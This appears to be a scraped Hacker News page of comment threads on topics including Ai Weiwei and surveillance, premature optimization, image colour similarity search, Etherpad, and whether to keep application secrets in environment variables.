ThomPete 3 hours ago 3 replies      
Just as understanding the science to music does not make you a good musician or allow you to build a great band, understanding the science to teams does not make you a good team builder.

I look at these things as performance art. Theory goes in the background when you perform all that is left is execution.

trhway 2 hours ago 2 replies      
it isn't surprising that the identified communication patterns correlate well with team being successful. Yet it is somewhat doubtful that such good communication can be enforced, ie. good communication seems to be a manifestation of a good team not what makes it.
Flapjack, monitoring notification routing and event processing
7 points by tylermauthe  5 hours ago   discuss
Ai Weiwei Is Living in Our Future
460 points by dirtyaura  23 hours ago   163 comments top 32
sp4ke 10 hours ago 9 replies      
I have always been fascinated by computers and passionate about programming. I never taught I would ever feel ashamed of my passion ... that maybe I have been part of the decline of freedom and privacy, the same things I've always believed in and fought for . I've finished reading again 1984 a short time ago, and I felt sick reading this article and realizing we're making a monster.

I stopped using Facebook a few months ago and it was not so easy as I thought. Since then, whenever I people ask me I give them my views about keeping privacy and such ... they always have the same reply: Why would you want to hide something ? or We can do nothing about it, everyone does it ... it makes me even sicker when it comes from Tech friends who understand the consequences but just don't care about it.

rasengan0 15 hours ago 1 reply      
We'll all take the red pill someday, but I swallowed the blue one already.I found the article enlightening, reminding me of the continued complacency and abject indifference in favor of convenience and other affordances of mindless empty rewards (yay, startups!) much like the Radiohead 1997 song, Fitter Happier https://en.wikipedia.org/wiki/OK_Computer

I missed the whole Ai Weiwei media storm due to disinterest and made up assumptions about yet another dissenter getting hammered down by the State; like duh? What else is new over "there"? Well on the internets, where is there or here?The article actually made me pause playing FTL to Google Ai WeiWei and watch the streamed Netflix documentary: http://aiweiweineversorry.com/ Wow, here was someone who could have kept his mouth shut and kept kowtowing to rake in the bucks, but instead choose a new "career path" out of politics and got a fat tax bill for the trouble. Gutsy move or sending a message? Let's hope the next generation gives damn.

XorNot 28 minutes ago 0 replies      
Ai Weiwei isn't living in our future, he's living in an actual totalitarian-ish nationstate.

The degree to which there's this encouraged ignorance to what the Chinese government is all about is the story which is of greater concern here: they're never not been a brutal regime, they're just a trade partner now so the narrative has shifted.

What they do, and what they can do isn't enabled by technology. It's enabled by the simple political and military will to actually kick in doors and arrest and execute people.

You want to not live in that world? Then you inform people why the no-fly list is stupid, for a start. How such a list is distributed, generated or updated is irrelevant.

Punoxysm 17 hours ago 3 replies      
Even if his criticisms of coveillance are correct, I still think the world is headed that way.

Simply put, you can't put the genie back in the bottle. We passed a similar threshold with industrialization, and the consequent removal of autonomy for workers on several levels (is the 1800's factory of exacting time cards and constant repetitive movements that far behind the warehouse the author describes?). It was a tumultuous transition (strikes, revolution, communism, etc.) but we made it through. The transformation in state and corporate power that tools like surveillance bring will be similar, but just like in the industrial revolution we can't turn back the clock and have to instead ride out whatever happens.

sabalaba 19 hours ago 4 replies      
Pretty alarmist writing. "I therefore cant resist showing a new piece of Google technology: the military robot WildCat made by Boston Dynamics which was bought by Google in December 2013". And goes on to show a video of something that was funded by DARPA well before Google purchased Boston Dynamics. Google has already said multiple times that it won't be pursuing any military contracts.
jeffhiggins 17 hours ago 4 replies      
The uncomfortable truth is that many HN readers are the ones gleefully building these tools.
MichaelTieso 6 hours ago 0 replies      
For those in the SF area, I highly recommend going to Alcatraz to experience some of Ai Weiwei's work. http://www.for-site.org/project/ai-weiwei-alcatraz/

Never Sorry is a fantastic documentary on Ai Weiwei's life. I contributed to documentary while it was Kickstarter and got to see it in a theater in DC. http://aiweiweineversorry.com/

kingkawn 16 hours ago 1 reply      
In the efforts to improve surveillance they have given us the tools to subvert it. Yes, they can watch us all, but we can also all watch each other. Yes, we have nothing to be ashamed of, and they no longer control the ability to spread ideas about what is shameful. When they are abusing one person, everyone can know.

Ai Wei Wei would not still be in communication with the world without the same technology that is permitting his surveillance.

At the same time as the surveillance state is growing, we are being told that all of the platforms that have the broadest potential reach are lame. That facebook is not cool, so any messages you send out on it will be judged by the medium, not the message. We have more than enough power already to reach other with messages that spread faster than a security state can quash them. The Chinese government's control isn't growing, its faltering. The US government's control isn't growing. They know more about us all, and can do less to us.

hansdezwart 9 hours ago 2 replies      
For me as the author of the piece, it is wonderful to find an informed and critical discussion of the themes that I tried to discuss here in the comments. I will likely try and answer some of them here in the next couple of hours and am happy to answer any questions.
tomaskafka 2 hours ago 0 replies      
"Hannah Arendts understanding of the political domain of the classic city would agree with the equation of walls with law and order. According to Arendt, the political realm is guaranteed by two kinds of walls (or wall like laws): the wall surrounding the city, which defined the zone of the political; and the walls separating private space from the public domain, ensuring the autonomy of the domestic realm.

The almost palindromic linguistic structure of law/wall helps to further bind these two structures in an interdependency that equates built and legal fabric. The unwalling of the wall invariably becomes the undoing of the law."

"The breaching of the physical, visual and conceptual border/wall exposes new domains to political power, and thus draws the clearest physical diagram to the concept of the state of exception."

"Future military operations in urban terrain will increasingly be dedicated to the use of technologies developed for the purpose of the unwalling of the wall.

This is the architects response to the logic of smart weapons. The latter have paradoxically resulted in higher numbers of civilian casualties simply because the illusion of precision gives the military political complex the necessary justification to use explosives in civilian environments where they cannot be used without endangering, injuring or killing civilians.

The imagined benefits of smart destruction and attempts to perform sophisticated swarming thus bring more destruction over the long term than traditional strategies ever did, because these ever more deadly methods combined with the highly manipulative and euphoric theoretical rhetoric used to promulgate them have induced decision makers to authorize their frequent use. Here another use of theory as the ultimate smart weapon becomes apparent. The militarys seductive use of theoretical and technological discourse seeks to portray war as remote, sterile, easy, quick, intellectual, exciting and even economic (from their own point of view). Violence can thus be projected as tolerable, and the public encouraged to support it."

Eyal Weizman

Lethal Theory


LiweiZ 17 hours ago 2 replies      
Sorry to digress here. Just want to comment on Ai. He is like many other iconic/famous people in the country, who got awards aboard, do things that seem against the ruling party in the country and basically walk away with way less consequences almost every time. Some of them get into short-term jail like hero and after that their experiences worth much more. This is very interesting since average people would probably face fatal consequences, if they did something like that, even once.
ekianjo 15 hours ago 1 reply      
That was a painful essay. No real point hammered through, jumping from one topic to another without clear logic, and again making it look like companies will be ruling the world in the future, while the surveillance capabilities of goverments far exceed what companies can hope to achieve because they cannot centralize all channels of information.
brianbarker 17 hours ago 1 reply      
The mentioned novels seem cool, but an even better reference is Feed. Published in 2002 before MySpace was a household name, it pretty much hits the nail on the head in terms of surveillance, marketing and connectedness.
narrator 3 hours ago 0 replies      
The Pavlok is really disturbing but cool at the same time. It's such a perfect example of technology that could be used for good or evil.
mmanfrin 16 hours ago 0 replies      
Egger's book that he mentions, The Circle, has unnerved me since I read it. I've noticed myself looking at things I do through the lens of that book, and then continuing with that action. It's like I'm on a bus that's headed for a cliff, and I've resigned myself to the fact that it's going to go over, so I might as well sit comfortably than make a fuss.
j_lev 9 hours ago 0 replies      
I wish I had read this before Christmas as I was stuck for gifts for younger people.
drumdance 5 hours ago 1 reply      
That picture of him in a cell with two guards looks like something out of a wax museum.
courtf 14 hours ago 2 replies      
"According to him, we have allowed efficiency thinking to optimize our world to such an extent that we have lost the flexibility and slack that is necessary for dealing with failure. This is why we can no longer handle any form of risk."

This rings true to me in many ways, particularly in the way we treat our children. I may have to read Anti-fragile.

jgon 18 hours ago 1 reply      
This is easily the most important article currently on the front page. At times its poignancy reminded me of some of the talks by Maciej Ceglowski, aka the guy who runs Pinboard, but this talk is a bit more direct and a bit less funny.

The world of coveillance or sousveillance sounds attractive, but I think that a quick look at the state of computing for the average person, and their ability to organize photos, run their own email server, or any number of tasks that would be somewhat analogous to the ability for citizens to have some form of meaningful technological power against large corporations and the government, should dispel this notion pretty quickly.

The frog is being slowly boiled right now, and I honestly don't have any answers about what to do. All I can think is just to do what I can to use free software, support organizations like the EFF and Mozilla, and work to make sure that my life isn't completely captured by giant companies like Google and Apple, as I also try to remain politically engaged at home.

Maybe that's all any of us can do.

jqm 1 hour ago 0 replies      
Eh... in my experience, most people simply aren't worth watching very closely.

Favorite part of the article..."he used Craigslist to hire somebody to help him improve his productivity. The idea was that the person would come sit next to him and give him a slap whenever he would not be working..."

Love the idea. I recently had a talk w/ my boss about I was thinking about leaving because I was making many times more on the side than I was with the company. But the one caveat... I needed him to keep being my boss and check on what I was doing. Make sure I was at my desk at 7:30 coding away and didn't go home until 5. He laughed quite a bit and said to think about it. I am.

I'm not in favor of massive surveillance, but sometimes knowing we are watched a little helps us at certain times....

deanclatworthy 14 hours ago 0 replies      
This documentary looks fantastic. I'm looking forward to watching this and Citizen Four.

A note to anyone who might be reading this before the article, don't read it all as it contains spoilers from the documentary.

Kiro 11 hours ago 0 replies      
That's a fantastic trailer. I need to see this.
rcyn 13 hours ago 2 replies      
"One of the best artists in the world." Since when do people rank artists. For me, this ruins the whole article. Maybe successful artist or artist with a high media profile. But best? Seriously?
squozzer 5 hours ago 0 replies      
Pardon me for "going meta" but it seems that power in the internet age may be less about how much information you have than on how much information you can keep out of the hands of others.

For example, just how transparent is Schmidt's or Zuckerberg's lives compared to ours?

Or why the US govt seems to be classifying greater and greater quantities of information?

And whether such asymmetries of power help or hurt our welfare.

ageek123 18 hours ago 1 reply      
We don't need to throw the baby out with the bath water. We just need to make sure government doesn't get too much power. This doesn't have anything to do with Google or Apple (they can't put you in jail).
Intermernet 11 hours ago 1 reply      
"Your lunchtime is exactly 29 minutes. You are fired on the spot if you take a 31 minute lunch as that messes with the planning capabilities of the system."

This is meant to describe "a large shipping warehouse in the US ... (think Amazon)" logistics system. Is this actually in any meaningful way true? If so, I'm disgusted, naive and disappointed.

EGreg 12 hours ago 0 replies      
I wrote quite extensively about this. For example:


knappador 9 hours ago 1 reply      
I don't really buy the privacy paranoia anymore these days. It was the internet that first grew the distance between people so that we could pretend-anonymous say things about anything without repercussion an it will be the internet that shrinks that distance down to where you better be talking about what matters to you and putting your money where your mouth is.

In ten years I'll be sharing and leaking at least 10x as much information out of all kinds of devices. 90% of my engagement will happen inside programs will be automatically syncing data across cloud services. Security is inevitably a growing target in the networked world, and privacy requires security. Increasingly for the sake of productivity and collaboration, everything I use will be sharing and syncing more and more. The desire of most people to be connected and productive, not some autocratic slide in the worlds governments will be the death of privacy.

One of the features of Facebook I liked in the early days was just the slight exclusiveness that made it basically okay to talk about having a giant hangover without fear of looking like an alcoholic to an interviewer scratching up dirt (I think zero interviews I care about do this). When Facebook started making the defaults public etc without notifications, there was understandably some uproar about being unknowingly thrust out into the public. Eroding privacy causing blunders is not the same thing as not having privacy. For the most part anxiety about not being able to control your privacy or security really need to be analyzed in the context of just how hidden you really need to make your words (in the case of anti-dissent government) or actions (in the case of socially conservative laws) to be able to practice or advocate what it is you care about. To an almost absolute degree, very little of things you want to see in the world that don't exist yet are going to require going to war for the cause of security or privacy before your end goals can be pursued, so it's just not really worth it.

EFF does great work to defend people against stupid laws and to promote better laws with regard to IP etc. They protect anonymity for regular people that happen to cosplay and have very odd taste in character appropriateness. However, the area where the EFF pulled really hard to ensure that the future of the internet would be egalitarian in the United States was about Title II common carrier law, not about privacy. The 1st amendment protects what you say, not some mythical right to say it without consequences; you only get that when nobody cares about your opinion. Even in the case of socially conservative laws, stand up for respect for individual beliefs before you stand up for privacy as an extra-social cure.

Privacy is not close to as fundamentally important as the security that is required to achieve it, and privacy advocacy is to an extent like whining about how someone took your tree-house and you can't have any secret clubs anymore. Most privacy is not used to do productive things, and few productive things outside of already entrenched, authoritarian governments require privacy to pursue.

bluekeybox 16 hours ago 0 replies      
No, he's not.
guoqiang2 18 hours ago 3 replies      
Didn't go through this TLDR writing, but just briefly scrolling the page.

I was so amazed the author can connect Ai Weiwei with the WildCat robot, an image of Obama's calling from a camp, and a kid in a car using Disney product.

How this can connect together?!

If you want to talk about surveillance or privacy, won't NSA's Snowden be a more famous and impacting example?

sfeng 18 hours ago 2 replies      
> The young boys that had to guard Ai Weiwei in his cell had to stand completely still, werent allowed to talk and couldnt even blink their eyes.

This is complete nonsense. You can't order someone to not blink.

tim333 9 hours ago 0 replies      
Ai Weiwei is not living our future. I'm a big fan of Weiwei but being the best known opposition figure against the worlds largest dictatorship is something that's unlikely to happen to most of us. Also his "Fuck your mother, the party central committee" themed photos are obviously trying to wind them up. Here in London we have CCTV everywhere and the secret services no doubt have the ability to bug me and read my mail but it effects me and most people not at all - no one is interested especially. I'd be honoured to be Weiwei.
We Used to Recycle Drugs from Patients' Urine
8 points by Petiver  3 hours ago   3 comments top 2
dalke 3 hours ago 0 replies      
The history is more tragic than that that light-hearted story lets on. Quoting from Wikipedia:

> Albert Alexander was a constable in the police force of the County of Oxford, England.[1] In December 1940, Constable Alexander was accidentally scratched by a rose thorn in his mouth. By the end of the month the scratch was badly infected with both Staphylococcus and Streptococcus and Constable Alexander was hospitalised in the Radcliffe Infirmary. Despite efforts of various treatments, Alexander's head was covered with abscesses and one of his eyes had been removed. ...

> On 12 February 1941, Constable Alexander was given an intravenous infusion of 160 mg (200 units) of penicillin. Within 24 hours, Alexander's temperature had dropped, his appetite had returned and the infection had begun to heal. However, due to the instability of penicillin and the war time restrictions placed on Florey's laboratory, only a small quantity of penicillin had been extracted and, although Florey and colleagues extracted any remaining penicillin from Alexander's urine, by the fifth day they had run out.[1]

> Constable Alexander died on 15 March 1941.[2]

> Florey and his team decided only to work on sick children who did not need such large amounts of penicillin, until their methods of production improved.[4]

iopq 51 minutes ago 1 reply      
Why not still do this to save costs? Also, the aforementioned environmental effect.
Improving math performance in glibc
4 points by LaSombra  31 minutes ago   discuss
Considering performance in the small is not premature optimization
90 points by mef  4 hours ago   62 comments top 22
syntheticnature 3 hours ago 1 reply      
Physician, heal thyself.

It always seemed evident to me that Knuth's exhortation was about making sure that the thing you were optimized was in fact a major contributor of code time usage -- and that your change was an improvement.

Telling people to avoid, for example, bounds checking because it might turn out to be a cycle soak later sounds like a good way to make your software worse, not better, in the hopes that a few instructions saved will make the difference. I once worked on a code base once with three different half-right hand-hacked versions of date formatting code. I replaced them with strftime(). Certainly the call was slower, but I was provably better off optimizing the timer routine that ran 50 times a second than worrying about hand-formatting dates into strings.

knightofmars 2 hours ago 1 reply      
I had a professor that used to say, "Make it work and then make it work fast." The point being that you need to both understand and solve the problem before you can figure out how to make the solution faster. It is the reason that the concept of a prototype exists in every engineering discipline.

As an additional perspective, compare the solution of an engineer with 2 years of experience to that of an engineer with 5 years of experience. If the solutions are drastically different then interpretation of a rule such as "avoiding premature optimization" will be drastically different as well.

Like any overly simplified statement, it is actually highly subjective. The author of the article even calls out the specific context in which their interpretation of Donald Knuth's rules are being applied, "Ive listed lots of relatively low-level things up there, but thats just because its the level I work at." and as such their interpretation doesn't necessarily apply in other contexts.

Premature optimization is a problem if you're approaching it from a place of ignorance. If you're doing it mindfully based on experience and domain knowledge then it starts to make sense. But even under these conditions your best intentions can be wrong. I've been in plenty of situations where I thought I'd identified a code bottleneck only to have a far easier, cheaper, and better solution completely unrelated to code come to light.

mmahemoff 3 hours ago 1 reply      
"The website is temporarily unable to service your request as it exceeded resource limit. Please try again later."


rajat 3 hours ago 0 replies      
All too often premature optimization is brought up as the antidote to carefully think about what you're implementing prior to actually opening up the IDE and start coding tests madly.

Thinking is hard, and takes time, and we want to get the feature out now, immediately, and worry about performance later. If at all.

And, sad to say (for an engineer), it's not clear that from a "business" perspective it's wrong. Hard to argue when accumulating features seems to matter more than crappy software. We have a lot more software these days, to run all of these bright new pieces of hardware, and perhaps because I'm an old-timer, the general quality seems to have degraded significantly. But the novelty of the stuff certainly has exploded, and I'm continually delighted by the twists and features that folks are coming up with, while being saddened by crashes, slowdowns, need for restarting, etc.

eterm 3 hours ago 3 replies      
Today I had to debug code with some database calls within 5 levels (at least) of for-each loops.

I stopped measuring at ~40,000 database round-trips.

"Engineering time costs more than CPU time" was the attitude, and for the original problem in its original specification, the solution was clearly OK.

But here we are, now needing to work out the original specifications, work out the current implementation (in case they differ anywhere), and work out whether it's worth re-writing it top-down or just fixing the worst of the loops.

And I'm not blaming whoever wrote this originally, it must have done its job to make it into the code base, but it really sucks to have to unpick it because an assumption of "database calls are free" is an assumption that unravels in a really messy way.

hindsightbias 3 hours ago 2 replies      
For some reason, the vast majority of developers take 'premature' to be a synonym of any.

If CS majors spent a fraction of the time learning how to optimize the way EE/CEs do, we'd need a lot less magic from the latter.

jayvanguard 1 hour ago 0 replies      
Yes, yes it is. Simply asserting the opposite doesn't suddenly invalidate an entire industry's decades worth of experience.

One good point from the essay though is Knuth's example of 12% speed increase for low effort is definitely worth doing. I agree.

A better way of putting things is:

Considering low effort, small performance improvements that don't affect other factors such as code readability or system maintainability is not "premature optimization".

If you are considering performance "in the small" and it affects maintainability you are indeed prematurely optmizing.

pekk 3 hours ago 3 replies      
"Premature" means "before measuring"
ky3 2 hours ago 0 replies      
Nobody's arguing that speed isn't important. What's more important is to get things right.

And no, incorporating speed in the specification doesn't make any difference. Suppose the spec says, "page must load in 200ms." Fine, if you don't care what correct page loading means, you're perfectly served with a blank one.

What's at the root of such intellectual capitulation? Complacency? Absence of skills? "Correctness is hard, let's just randomly perturb settings instead while fiddling with a stopwatch. Correctness is hard, let's just conflate motion with progress."

Whence the shabby treatment of correctness like porn: I'll know it when I see it.

dyadic 1 hour ago 0 replies      
I'm very happy to see this article and more people taking this mindset.

Many people don't even know the context or the original quote. And many times I've seen discussions about improving a piece of code shot down by a single incantation of this Knuth. It's sad.

0xdeadbeefbabe 1 hour ago 0 replies      
Your small is another man's big. So, "don't prematurely optimize" could be said another way, "a different point of view is like losing 80 IQ points" or you could say it positively like Kay does http://en.wikiquote.org/wiki/Alan_Kay, but I think he's only positive because he drinks once in a while.
lnanek2 2 hours ago 0 replies      
Hmm, he complains about the awesome bar being coded inefficiently, but I'm on a several year old laptop and the awesome bar is pretty much instant at showing results for me when I type a key. So his evidence is not compelling in my experience. Reading his links, it sounds like his memory error checking tool is what causes slow down, not the usual Chrome code. Kind of bizarre he is pointing fingers at others when his stuff is the problem that needs to be worked on.

His whole argument boils down to:> Considering performance in the small is not premature optimization, it is simply good engineering, and good craftsmanship

But that's the same reason German industry tends to compete so badly right now. They do a lot of hand trimmed and finished components that really could have been better designed for automation and require less custom craftsmanship. His argument seems to boil down to aesthetics.

bcheung 2 hours ago 0 replies      
Considering performance is a basic tenant of software architecture and engineering. Obsessing about it needlessly is the "premature" part. Considering the business case is the most important thing to remember.
stevebot 3 hours ago 1 reply      
The problem I have found is not early optimization, but knowing what to optimize early and what can wait. Everything in a system can be optimized, but there obviously isn't the time to do this.

I work in Android, so optimizing I look at first is bitmap loading, backgrounding tasks, and sqlite queries. Usually, this is where 90% of the performance benefit comes from.

sp332 3 hours ago 1 reply      
skybrian 1 hour ago 0 replies      
This article is not that well optimized. It could have been much shorter. I think just the lesser-known Knuth quote would be enough.
michaelvkpdx 3 hours ago 0 replies      
Brilliant blog. Thank you for writing this. Optimization is important! You don't have to tune everything to the fastest possible speed. But remember, in web programming, you may be writing a function that is called 10 or 100 or 500 times per request. That little optimization will add up quickly.

Be smart when developing, and know where the easy optimizations and common pitfalls are in your language and toolset. Optimize as you can without sacrificing maintainability.

current_call 2 hours ago 0 replies      
"As a developer, I am tired of my IDE slowing to a crawl when I try to compile multiple projects at a time. I am tired of being unable to trust the default behavior of the standard containers. I am tired of my debug builds being unusably slow by default."

Don't forget web browsers. Web browsers are horrible.

ajarmst 3 hours ago 0 replies      
The way I phrased it once (thankfully no students complained) is that premature optimization is like premature ejaculation. You don't want to do it too early, but it is important to get to it eventually.
Toine 3 hours ago 1 reply      
TLDR : sometimes you need to optimize.

I don't understand what's new.

PythonicAlpha 2 hours ago 0 replies      
He is right.

He is right about premature optimizations and also right about craftsmanship.

Many performance problems stem from bad overall design decisions, bad abstractions and bad data structures (summarized: craftsmanship). I always wonder, how fast today's processors have become and how slow they get with today's software.

One of my first computers had 64k of memory and a processor that was so incredible slow compared to today's processors, that it is unbelievable. And still, they made so many good software with it. In today's programs the resources of this computer would not suffice for the idle loop.

Also the first Unix computer that I worked on, had only 8MB of memory and had X11, LaTeX and many other stuff!

It was a long way down the road of abstractions, that today's computer could hardly live with 1GB of memory and 1GHz processor (2 cores, please, please!) for basic usage.

The real art in computer science is, to know where to optimize -- to use your time most effectively.

dang 2 hours ago 2 replies      
We changed the title to a representative sentence from the article. If anyone can suggest a better one, we'll change it again.
Data Structures for Text Sequences (1998) [pdf]
20 points by ashish01  4 hours ago   1 comment top
topherjaynes 3 hours ago 0 replies      
I don't know if the first line of the abstract is the most ironic typo, or a joke.

'to' is out of sequence

"The data structure used ot maintain the sequence of characters is an important part of a texteditor."

A Hacker's Hit List of American Infrastructure
12 points by mparramon  2 hours ago   discuss
How to build a simple image and primary-colour similarity database
62 points by teh  8 hours ago   11 comments top 7
jerluc 1 hour ago 0 replies      
For those of you interested in this subject, there is a library called LIRE (http://www.semanticmetadata.net/lire/) that's been around for a long time which will index various color and textures features into a feature vector compatible with Lucene. It does end up with the interesting scenario of requiring the search query itself to be an image, but if you are looking for a solution whereby for a given image you can find other images most similar to it (and ranked, of course), this does the job surprisingly well.
cordite 8 hours ago 1 reply      
The first thought I had would be to put this into HSV, and then index that with an R-tree [1]. This way, you can do nearest neighbor kind of stuff, similar to geospatial indexing.

[1]: http://en.wikipedia.org/wiki/R-tree

leeoniya 7 hours ago 0 replies      
> A few obvious choices are a better ranker or transforming to perception-friendly colour spaces like HSV.

HSV is not good for perceptual comparison. Try HSP [1].

[1] http://alienryderflex.com/hsp.html

btown 7 hours ago 0 replies      
As with anything in image machine learning, it's all about the complexity of your feature space and how well it captures your business needs. Starting with nearest-neighbors with color-based features is a great starting point, and it's always great to see posts that start from scratch and show how far you can get.

For those interested in some of the commercial solutions in the space, Cortexica ( http://www.cortexica.com/ ) is doing interesting work using neural networks for fashion image similarity. Sadly, they seem to be focusing on white-label solutions rather than having an API.

spdustin 7 hours ago 2 replies      
Why not a quick check of the upper-left pixel color, and if that's similar to one of the identified "popular" colors, remove it? I'd suspect most of the source material would be photographed professionally on a uniform background color.

I chose upper-left simply because these sorts of photos would likely would be framed in a way that the background is visible in the upper margins, while possibly cropping the object at the bottom of the frame.

NIL8 7 hours ago 0 replies      
The page you linked to is very pleasant to view. The colors, spacing, and layout are remarkable. Your tutorial is great, too.
inovica 6 hours ago 0 replies      
That was a good read. We are currently working on a tool to match product images and its hard (but fun) to do. I'd like to know if anyone has created anything like this already in Python and if so if you'd be prepared to have a chat with us?
Etherpad 1.5 Released Features full pad export, import
50 points by Johnyma22  10 hours ago   15 comments top 5
sheetjs 3 hours ago 1 reply      
> Full Etherpad Pad Export and Import

Is there a way on the beta site to start from a file? For example, with ethercalc, you can drop an XLSX or CSV file and it creates an instance from that document ( https://ethercalc.org/ )

gavreh 3 hours ago 1 reply      
Any word when https://etherpad.mozilla.org will be updated?
cultavix 4 hours ago 1 reply      
I just started typing some stuff, testing everything out and then it kicked me out. Perhaps it's because I was using foul language?
brunoqc 3 hours ago 2 replies      
Is there a free hosted version?
math0ne 4 hours ago 1 reply      
Looks cool, but the demo is down...
Surprise Journal: Notice the unexpected
9 points by keerthiko  4 hours ago   discuss
Environment Variables Considered Harmful for Your Secrets
172 points by pwim  14 hours ago   96 comments top 29
CraigJPerry 13 hours ago 3 replies      
This article is misguided. Environment variables can be more secure than files. Furthermore, in the presented case there's no improvement in security by switching to a file.

To address my second claim first: file permissions work at the user or group level. ACLs / MAC likewise. SELinux can be configured to assist in this case but it's not as trivial as it appears at first glance, it would be easier to use environment variables.

In the example case of spawning imagemagik, it's running as the same user and therefore has the same level of access to the properties file. That is, it can access the secrets without negotiating any authorisation to do so.

Depending on how imagemagik is launched and how the parent process handles the config file, it's possible that imagemagik could inherit a file handle, already open to the file.

Now to address my first claim, if the parent process is following best practice then it will sanitise the environment before exec'ing imagemagik, that should mean launching the imagemagik process with only the environment it needs.

To give a concrete example, the postfix mail transfer agent is extraordinarily high quality software, its spawn process owns the responsibility of launching external processes, potentially sysadmin supplied / external to postfix. This case would be very comparable to the web app invoking imagemagik.

We can see that it explicitly handles this case as I've suggested is best practice: https://github.com/vdukhovni/postfix/blob/master/postfix/src...

EDIT: accidentally posted before finishing.

If the parent sanitised the child's environment, then the only way for the child to access the data would be to read the parents memory. In practice this is quite easy - try the "ps auxe" command for a sample, however this access can much more easily be controlled by SELinux policy than can file access.

Any obfuscation technique applicable to a config file can similarly be applied to an environment variable.

phunge 5 hours ago 3 replies      
There's a not-widely-publicized feature of Linux that allows programs to store secrets directly in the kernel: https://www.kernel.org/doc/Documentation/security/keys.txt That has some advantages, including the guarantee that it can't be swapped to disk. Kerberos can use it for secret storage, I haven't seen it used elsewhere though.

It looks like process-private storage is one of its features.

ntucker 12 hours ago 3 replies      
My company has an internal bit of infrastructure that I think is a somewhat novel approach that allows us to never have any secrets stored unencrypted on disk. There's a server (a set of servers, actually, for redundancy) called the secret server, and its only job is to run a daemon that owns all the secrets. When an app on another server is started up, it must be done from a shell (we use cap) which has an SSH agent forwarded to it. In order for the app to get its database passwords and various other secrets, it makes a request to the secret server (over a TLS-encrypted socket), which checks your SSH identity against an ACL (different identities can have access to different secrets) and does a signing challenge to verify the identity, and if all passes muster, it hands the secrets back. The app process keeps the secrets in memory and your cap shell disconnects, leaving the app unable to fetch any more secrets on your behalf.

The other kink is that the secret server itself reads the secrets from a symmetrically-encrypted file and when it boots, it doesn't actually know how to decrypt it. There's a master key for this that's stored GPG encrypted so that a small number of people can retrieve it and use a client tool that sends the secret server an "unlock" command containing the master key. So any time a secret server reboots, someone with access needs to gpg --decrypt mastersecret | secret_server_unlock_command someserver

There are some obvious drawbacks to this whole system (constraining pushes to require an SSH agent connection is a biggie and wouldn't fly some places, and agent forwarding is not without its security implications) and some obvious problems it doesn't solve (secrets are obviously still in RAM), but on the whole it works very well for distributing secrets to a large number of apps, and we have written tools that have basically completely eliminated any individual's need to ever actually lay eyes on a secret (e.g. if you want to run any tool in the mysql family, there's a tool that fetches the secret for you and spawns the tool you want with MYSQL_PWD temporarily set in the env, so you need not copy/paste it or be tempted to stick it in a .my.cnf).

bodyfour 13 hours ago 2 replies      
Classic UNIX behavior was that environment variables were public (any user could see them with the right flags to "ps") so it was well-known not to put anything secret there.

Most (all?) of the current brand of UNIX variants have locked this down quite a while ago, which is a good thing. There are still a few old boxes kicking around though so if you're writing code that is meant to be widely deployed please don't put stuff there. For example: https://github.com/keithw/mosh/issues/156

Even if you are sure that your code will only be running on modern machines I think this article gives good advise. Unless you purge the secret environment variables when you launch they'll get sent to all of your subprocesses and it's quite possible that one of them won't consider their environment secret.

kgilpin 8 hours ago 2 replies      
Installing secrets on disk exposes them to potential leakage through backups. This is a major issue, since much less attention is typically paid to access management for backups than to production servers. Therefore I support the approach of providing secrets through the environment.

Once an application has been written to get its secrets from the environment, there is a question of how the secrets are obtained. They can be sourced from a file in an init script, but today we are seeing a lot of momentum towards containerized architecture, and the use of service discovery and configuration systems like etcd, zookeeper and consul.

However, secrets require much more attention to security concerns than the data that these tools are designed to handle. Least privilege, separation of duties, encryption, and comprehensive audit are all necessary when dealing with secrets material. To this end, we have written a dedicated product which provides management and access for secrets and other infrastructure resources (e.g. SSH, LDAP, HTTP web services). The deployment model is similar to the HA systems provided by etcd, consul, SaltStack, etc. It's called Conjur (conjur.net).

SwellJoe 13 hours ago 2 replies      
I've always been uncomfortable with the "store config in the environment" part of the 12 factor app thing, since it does imply storing things like database passwords and such, and the argument is that those shouldn't be in files. But, filesystem permissions are reasonably flexible and are easy to reason about (unlike the potential visibility of ENV).

I also don't really buy the arguments for ENV storage of even non-sensitive data. There's just not really any good reason to do so; your config has to be put in place by some tool, even if it is in ENV; why not make your tool produce a file, with reasonable permissions in a well-defined default location? The 12 Factor App article seems to believe that config files live in your source tree, and are thus easily accidentally checked into revision control. That's not where my config files live. My config files live in /etc; or, if I want it to isolate a service to a user, I make a /home/user/etc directory.

One could say, "Don't store passwords in the revision control system alongside your source." And that would be reasonable. But, there's no reason to throw the baby out with the bath water.

ealexhudson 13 hours ago 2 replies      
Fundamentally, any secrets you store will have some mode of access - there's a downside to each and every way of distributing them.

If you're shelling out to commands you think might snarf credentials, the environment is easy for them to pick it out of, but if they're running as the same user then they could probably read the secrets from the config file. If they aren't running as the same user, you need a way of passing in the secrets - and we tend to come back to environment variables..

The good practice here is just to reset the environment when calling shell commands, as he notes. It's not hard to do.

fubarred 13 hours ago 0 replies      
Ultimately, secrets need to live somewhere and need to be accessed as plain text. Just make sure that the access as small window is as possible, and try to obliterate it after use, if possible.

If one absolutely needs to centralize secrets (TLS/SSL private keys, entropy sources, etc.) (at risk of SPOF or some HA setup), use some PSK style setup that delivers them directly, out-of-band (via separate NICs) or prioritized ahead of regular traffic. Keep it simple. Otherwise, prefer something like zookeeper with encrypted secrets (again PSK keying per box). Try to not deploy the same secret on every box, if possible. Also, try to avoid magic secrets if you can too (remove all local password hashes, use only auth keys).

If you're uncomfortable with plaintext secrets, encrypt them (as end-to-end as possible) and require an out-of-band decryption key at the last possible moment.

It's like having a secure document viewing system... ultimately, someone will need to browse just enough of the plaintext version, or it's not a document viewing system.

louwrentius 8 hours ago 0 replies      
Please don't use environment variables to store secrets. There are to many angles - as stated by others - where this data may leak into files or processes.

I would propose to use just one folder like /secret and put your config files in there. Exclude this folder from backup on all relevant hosts.

Then spend your time on security of your hosts, applications (OWASP) and monitoring / alerting. Something that you have to do anyway.

phunge 6 hours ago 0 replies      
There's a (not widely publicized) feature of Linux that enables secure key storage inside the kernel: https://www.kernel.org/doc/Documentation/security/keys.txt Storing keys in the kernel has some advantages -- your key will never get inadvertently swapped to disk etc.

It's been too long since I used it to remember the details, but I believe process-private keys are one of this API's features.

RubyPinch 10 hours ago 1 reply      
Assuming you arn't trying to go for top security, and just want a way to keep things safe from leaking due to errors and the such

why not just make use of the OS's secrets store? for example, like how https://pypi.python.org/pypi/keyring operates

jmnicolas 9 hours ago 1 reply      
